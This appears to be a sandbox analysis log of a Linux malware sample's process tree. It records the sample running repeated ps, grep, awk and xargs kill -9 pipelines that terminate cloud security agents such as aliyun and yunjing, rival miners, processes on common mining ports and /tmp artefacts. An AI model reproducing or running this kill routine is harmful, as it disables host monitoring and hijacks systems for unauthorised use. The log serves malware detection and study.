  PID:1667
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1669
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1668
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1671
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1670
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1675
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1674
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1676
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1673
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1681
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1680
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1679
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1678
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1687
- /bin/grep
  grep -v -
  2⤵
  PID:1686
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1685
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1684
- /bin/grep
  grep :443
  2⤵
  PID:1683
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1693
- /bin/grep
  grep -v -
  2⤵
  PID:1692
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1691
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1690
- /bin/grep
  grep :23
  2⤵
  PID:1689
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1699
- /bin/grep
  grep -v -
  2⤵
  PID:1698
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1697
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1696
- /bin/grep
  grep :443
  2⤵
  PID:1695
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1706
- /bin/grep
  grep -v -
  2⤵
  PID:1705
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1704
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1703
- /bin/grep
  grep :143
  2⤵
  PID:1702
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1714
- /bin/grep
  grep -v -
  2⤵
  PID:1713
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1712
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1711
- /bin/grep
  grep :2222
  2⤵
  PID:1710
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1720
- /bin/grep
  grep -v -
  2⤵
  PID:1719
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1718
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1717
- /bin/grep
  grep :3333
  2⤵
  PID:1716
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1726
- /bin/grep
  grep -v -
  2⤵
  PID:1725
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1724
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1723
- /bin/grep
  grep :3389
  2⤵
  PID:1722
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1732
- /bin/grep
  grep -v -
  2⤵
  PID:1731
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1730
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1729
- /bin/grep
  grep :4444
  2⤵
  PID:1728
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1738
- /bin/grep
  grep -v -
  2⤵
  PID:1737
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1736
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1735
- /bin/grep
  grep :5555
  2⤵
  PID:1734
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1744
- /bin/grep
  grep -v -
  2⤵
  PID:1743
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1741
- /bin/grep
  grep :6666
  2⤵
  PID:1740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1750
- /bin/grep
  grep -v -
  2⤵
  PID:1749
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1748
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1747
- /bin/grep
  grep :6665
  2⤵
  PID:1746
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1756
- /bin/grep
  grep -v -
  2⤵
  PID:1755
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1754
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1753
- /bin/grep
  grep :6667
  2⤵
  PID:1752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1762
- /bin/grep
  grep -v -
  2⤵
  PID:1761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1759
- /bin/grep
  grep :7777
  2⤵
  PID:1758
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1768
- /bin/grep
  grep -v -
  2⤵
  PID:1767
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1766
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1765
- /bin/grep
  grep :8444
  2⤵
  PID:1764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /bin/grep
  grep -v -
  2⤵
  PID:1773
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1772
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1771
- /bin/grep
  grep :3347
  2⤵
  PID:1770
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1782
- /bin/grep
  grep -v -
  2⤵
  PID:1781
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1780
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1779
- /bin/grep
  grep :14444
  2⤵
  PID:1778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1791
- /bin/grep
  grep -v -
  2⤵
  PID:1790
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1789
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1788
- /bin/grep
  grep :14433
  2⤵
  PID:1787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1798
- /bin/grep
  grep -v -
  2⤵
  PID:1797
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1796
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1795
- /bin/grep
  grep :13531
  2⤵
  PID:1794
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1803
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1802
- /bin/grep
  grep -v grep
  2⤵
  PID:1801
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:1800
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1799
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1808
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1807
- /bin/grep
  grep -v grep
  2⤵
  PID:1806
- /bin/grep
  grep ./crun
  2⤵
  PID:1805
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1804
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1813
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1812
- /bin/grep
  grep -v grep
  2⤵
  PID:1811
- /bin/grep
  grep -vw salt-minions
  2⤵
  PID:1810
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1809
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1818
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1817
- /bin/grep
  grep :3333
  2⤵
  PID:1816
- /bin/grep
  grep -v grep
  2⤵
  PID:1815
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1814
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1823
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1822
- /bin/grep
  grep :5555
  2⤵
  PID:1821
- /bin/grep
  grep -v grep
  2⤵
  PID:1820
- /bin/ps
  ps aux
  2⤵
  PID:1819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1828
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1827
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1826
- /bin/grep
  grep -v grep
  2⤵
  PID:1825
- /bin/ps
  ps aux
  2⤵
  PID:1824
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1833
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1832
- /bin/grep
  grep log_
  2⤵
  PID:1831
- /bin/grep
  grep -v grep
  2⤵
  PID:1830
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1829
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1838
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1837
- /bin/grep
  grep systemten
  2⤵
  PID:1836
- /bin/grep
  grep -v grep
  2⤵
  PID:1835
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1843
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1844
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1844
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1844
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1844
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1844
- - /bin/kill
    kill -9 14
    3⤵
    - Reads CPU attributes
    PID:1844
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1842
- /bin/grep
  grep netns
  2⤵
  PID:1841
- /bin/grep
  grep -v grep
  2⤵
  PID:1840
- /bin/ps
  ps aux
  2⤵
  PID:1839
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1849
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1848
- /bin/grep
  grep voltuned
  2⤵
  PID:1847
- /bin/grep
  grep -v grep
  2⤵
  PID:1846
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1845
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1854
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1853
- /bin/grep
  grep darwin
  2⤵
  PID:1852
- /bin/grep
  grep -v grep
  2⤵
  PID:1851
- /bin/ps
  ps aux
  2⤵
  PID:1850
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1859
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1858
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1857
- /bin/grep
  grep -v grep
  2⤵
  PID:1856
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1855
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1864
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1863
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1862
- /bin/grep
  grep -v grep
  2⤵
  PID:1861
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1860
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1869
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1868
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1867
- /bin/grep
  grep -v grep
  2⤵
  PID:1866
- /bin/ps
  ps aux
  2⤵
  PID:1865
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1874
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1873
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1872
- /bin/grep
  grep -v grep
  2⤵
  PID:1871
- /bin/ps
  ps aux
  2⤵
  PID:1870
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1879
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1878
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1877
- /bin/grep
  grep -v grep
  2⤵
  PID:1876
- /bin/ps
  ps aux
  2⤵
  PID:1875
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1884
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1883
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1882
- /bin/grep
  grep -v grep
  2⤵
  PID:1881
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1880
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1889
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1888
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1887
- /bin/grep
  grep -v grep
  2⤵
  PID:1886
- /bin/ps
  ps aux
  2⤵
  PID:1885
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1894
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1893
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1892
- /bin/grep
  grep -v grep
  2⤵
  PID:1891
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1890
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1899
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1898
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1897
- /bin/grep
  grep -v grep
  2⤵
  PID:1896
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1895
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1904
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1903
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1902
- /bin/grep
  grep -v grep
  2⤵
  PID:1901
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1900
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1909
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1908
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1907
- /bin/grep
  grep -v grep
  2⤵
  PID:1906
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1905
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1914
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1913
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1912
- /bin/grep
  grep -v grep
  2⤵
  PID:1911
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1910
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1919
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1918
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1917
- /bin/grep
  grep -v grep
  2⤵
  PID:1916
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1915
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1924
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1923
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1922
- /bin/grep
  grep -v grep
  2⤵
  PID:1921
- /bin/ps
  ps aux
  2⤵
  PID:1920
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1929
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1928
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1927
- /bin/grep
  grep -v grep
  2⤵
  PID:1926
- /bin/ps
  ps aux
  2⤵
  PID:1925
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1934
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1933
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1932
- /bin/grep
  grep -v grep
  2⤵
  PID:1931
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1930
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1939
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1938
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1937
- /bin/grep
  grep -v grep
  2⤵
  PID:1936
- /bin/ps
  ps aux
  2⤵
  PID:1935
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1944
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1943
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1942
- /bin/grep
  grep -v grep
  2⤵
  PID:1941
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1940
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1949
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1948
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1947
- /bin/grep
  grep -v grep
  2⤵
  PID:1946
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1945
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1954
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1953
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1952
- /bin/grep
  grep -v grep
  2⤵
  PID:1951
- /bin/ps
  ps aux
  2⤵
  PID:1950
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1959
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1958
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1957
- /bin/grep
  grep -v grep
  2⤵
  PID:1956
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1955
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1964
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1963
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1962
- /bin/grep
  grep -v grep
  2⤵
  PID:1961
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1960
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1969
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1968
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1967
- /bin/grep
  grep -v grep
  2⤵
  PID:1966
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1974
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1973
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1972
- /bin/grep
  grep -v grep
  2⤵
  PID:1971
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1970
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1979
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1978
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1977
- /bin/grep
  grep -v grep
  2⤵
  PID:1976
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1975
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1984
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1983
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1982
- /bin/grep
  grep -v grep
  2⤵
  PID:1981
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1980
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1989
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1988
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1987
- /bin/grep
  grep -v grep
  2⤵
  PID:1986
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1985
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1994
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1993
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1992
- /bin/grep
  grep -v grep
  2⤵
  PID:1991
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1990
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1999
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1998
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1997
- /bin/grep
  grep -v grep
  2⤵
  PID:1996
- /bin/ps
  ps aux
  2⤵
  PID:1995
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2004
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2003
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2002
- /bin/grep
  grep -v grep
  2⤵
  PID:2001
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2000
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2009
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2008
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2007
- /bin/grep
  grep -v grep
  2⤵
  PID:2006
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2005
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2014
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2013
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2012
- /bin/grep
  grep -v grep
  2⤵
  PID:2011
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2010
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2019
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2018
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2017
- /bin/grep
  grep -v grep
  2⤵
  PID:2016
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2015
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2024
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2023
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2022
- /bin/grep
  grep -v grep
  2⤵
  PID:2021
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2020
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2028
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2027
- /bin/grep
  grep -v grep
  2⤵
  PID:2026
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2025
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2032
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2031
- /bin/grep
  grep -v grep
  2⤵
  PID:2030
- /bin/ps
  ps aux
  2⤵
  PID:2029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2038
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2037
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2036
- /bin/grep
  grep -v grep
  2⤵
  PID:2035
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2034
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2042
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2041
- /bin/grep
  grep -v grep
  2⤵
  PID:2040
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2047
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2046
- /bin/grep
  grep -v grep
  2⤵
  PID:2045
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2053
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2052
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2051
- /bin/grep
  grep -v grep
  2⤵
  PID:2050
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2058
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2057
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2056
- /bin/grep
  grep -v grep
  2⤵
  PID:2055
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2054
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2064
- - /usr/local/sbin/kill
    kill -9 1466
    3⤵
    PID:2065
- - /usr/local/bin/kill
    kill -9 1466
    3⤵
    PID:2065
- - /usr/sbin/kill
    kill -9 1466
    3⤵
    PID:2065
- - /usr/bin/kill
    kill -9 1466
    3⤵
    PID:2065
- - /sbin/kill
    kill -9 1466
    3⤵
    PID:2065
- - /bin/kill
    kill -9 1466
    3⤵
    - Reads CPU attributes
    PID:2065
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2063
- /bin/grep
  grep "]"
  2⤵
  PID:2062
- /bin/grep
  grep -v aux
  2⤵
  PID:2061
- /bin/grep
  grep -v grep
  2⤵
  PID:2060
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2070
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2069
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2068
- /bin/grep
  grep -v grep
  2⤵
  PID:2067
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2066
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2074
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2073
- /bin/grep
  grep -v grep
  2⤵
  PID:2072
- /bin/ps
  ps aux
  2⤵
  PID:2071
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2079
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2078
- /bin/grep
  grep -v grep
  2⤵
  PID:2077
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2087
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2086
- /bin/grep
  grep -v _
  2⤵
  PID:2085
- /bin/grep
  grep -v -
  2⤵
  PID:2084
- /bin/grep
  grep -v /
  2⤵
  PID:2083
- /bin/grep
  grep -v grep
  2⤵
  PID:2082
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2081
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2092
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2091
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2090
- /bin/grep
  grep -v grep
  2⤵
  PID:2089
- /bin/ps
  ps aux
  2⤵
  PID:2088
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2097
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2096
- /bin/grep
  grep rsync
  2⤵
  PID:2095
- /bin/grep
  grep -v grep
  2⤵
  PID:2094
- /bin/ps
  ps aux
  2⤵
